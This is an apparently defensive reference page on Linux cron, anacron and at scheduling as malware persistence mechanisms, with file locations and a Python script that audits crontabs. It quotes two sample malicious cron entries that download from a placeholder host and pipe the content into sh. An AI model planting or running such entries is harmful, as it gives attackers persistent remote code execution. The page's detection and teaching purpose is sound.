Cron Jobs

Cron is a time-based job scheduler in *nix operating systems. It allows users to schedule commands or scripts to run at specific times or intervals. Cron jobs are often used to automate tasks, such as backups, file maintenance, and software updates. Unfortunately, it can also be leveraged by malicious actors for malware persistence.

There are two executables of note. The first is crond, the daemon that runs in the background and is responsible for executing the cron jobs. crond reads the crontab (cron table) file, which defines the execution schedule in a simple text format and contains the following [1]:

  • The time or interval at which the job should run
  • The command or script that should be run
  • The user that should run the job

These files can be system-wide or user specific.

Crontab File format

A cron job is defined by a single line in a crontab file, structured as follows:


* * * * * command-to-be-executed
- - - - -
| | | | |
| | | | ----- Day of the week (0 - 7) (Sunday = 0 or 7)
| | | ------- Month (1 - 12)
| | --------- Day of the month (1 - 31)
| ----------- Hour (0 - 23)
------------- Minute (0 - 59)

Each field can contain a single number, a comma-separated list of numbers, a range of numbers, or an asterisk (representing all possible numbers).

The second executable is crontab, which is used to manage the crontab files. crontab -e can be used to edit the crontab file.

Examples

*/11 * * * * wget -O - -q http://<malicious_url>/pics/logo.jpg|sh

*/5 * * * * curl http://<malicious_url>/malicious.png -k|dd skip=2446 bs=1|sh
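Both entries above fetch remote content and pipe it into sh, which is a pattern a defender can search for when reviewing crontab files. The following Python is an added example, not code from the original page: it parses crontab lines (user format, or system format with a user field) and flags jobs where a download tool feeds an interpreter. The function names, the FETCHERS and INTERPRETERS lists, and the benign sample lines are assumptions made for illustration.

```python
import re

FETCHERS = {"wget", "curl"}  # assumed list of tools that pull remote content
INTERPRETERS = {"sh", "bash", "dash", "zsh", "ksh", "python3", "perl"}

def parse_entry(line, has_user_field=False):
    """Return (schedule, user, command) for a job line, else None.
    has_user_field=True is for /etc/crontab and /etc/cron.d files, which
    carry a user name between the schedule and the command."""
    line = line.strip()
    # Blank lines, comments and NAME=value environment lines are not jobs.
    if not line or line.startswith("#") or re.match(r"\w+\s*=", line):
        return None
    n_sched = 1 if line.startswith("@") else 5  # @reboot etc. replace 5 fields
    n_head = n_sched + (1 if has_user_field else 0)
    parts = line.split(None, n_head)
    if len(parts) <= n_head:
        return None  # schedule without a command
    user = parts[n_sched] if has_user_field else None
    return " ".join(parts[:n_sched]), user, parts[-1]

def command_names(stage):
    """Program names of the simple commands (split on ; and &&) in a stage."""
    cmds = [c.split() for c in re.split(r";|&&", stage)]
    return {c[0].rsplit("/", 1)[-1] for c in cmds if c}

def fetch_piped_to_interpreter(command):
    """True when a fetcher is followed, later in the pipeline, by an interpreter.
    Naive split on '|': quoting and $(...) substitution are not handled."""
    stages = [command_names(s) for s in command.split("|")]
    return any(FETCHERS & names and any(INTERPRETERS & later for later in stages[i + 1:])
               for i, names in enumerate(stages))

def audit(lines, has_user_field=False):
    """Return (line_number, user, command) for every flagged job line."""
    parsed = ((n, parse_entry(l, has_user_field)) for n, l in enumerate(lines, 1))
    return [(n, e[1], e[2]) for n, e in parsed if e and fetch_piped_to_interpreter(e[2])]

# The two entries from the page plus constructed benign lines.
USER_CRONTAB = [
    "MAILTO=root",
    "0 2 * * * /usr/local/bin/backup.sh",
    "*/11 * * * * wget -O - -q http://<malicious_url>/pics/logo.jpg|sh",
    "*/5 * * * * curl http://<malicious_url>/malicious.png -k|dd skip=2446 bs=1|sh",
    "@reboot curl -s https://updates.example.com/version.txt > /tmp/version",
]
if __name__ == "__main__":
    for hit in audit(USER_CRONTAB):
        print(hit)
```

A hit is a lead for review rather than proof of compromise, and a clean result does not rule out other persistence techniques in cron.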

Managing crontab entries:

  • crontab -l lists the current user's crontab entries.
  • crontab -e opens the user's crontab file for editing.
  • crontab -r removes the user's crontab file.

User Crontab file locations

The crontab files for individual users are stored in the /var/spool/cron directory. Each user's crontab file has the same name as the username.

For example, the crontab file for the cbeard user would be at /var/spool/cron/cbeard.

System-wide cron jobs are also stored in the /etc/crontab file. The /etc/cron.d/ directory also stores system-wide cron files, where each file represents a separate cron job.

Scheduling with anacron

anacron is similar to cron in that it is also used for running scheduled tasks [2].

The primary difference between anacron and cron is how they handle missed or skipped jobs. In cron, if a system is powered off or inactive at the scheduled time of a task, the task will not be executed. anacron is designed to address this limitation by allowing the execution of missed tasks when the system becomes active again.

System-wide tasks are defined in the main configuration file (/etc/anacrontab), while user-specific tasks are defined in separate per-user configuration files located in /var/spool/anacron/.

System Crontab file locations

System packages schedule jobs by placing scripts in the /etc/cron.d folder.

/etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly: These directories contain scripts that run every hour, day, week, or month, respectively. Jobs can be scheduled by placing script files in these folder locations. The cron daemon will run the scripts per the schedule.

Task scheduling using the 'at' command

The at command can be used to schedule one-time tasks or commands to run at a specific time in the future. It is particularly useful for scheduling jobs that need to run only once, without any recurring pattern.

Note that the job history of the at command cannot be recovered, as the entry is purged from the job queue after the task executes.

The queue can be inspected as follows:

cat /var/spool/at/<job_id>

cat /var/spool/at/spool/<job_id>

[1] https://sandflysecurity.com/blog/linux-malware-persistence-with-cron/
[2] https://linuxconfig.org/how-to-run-commands-periodically-with-anacron-on-linux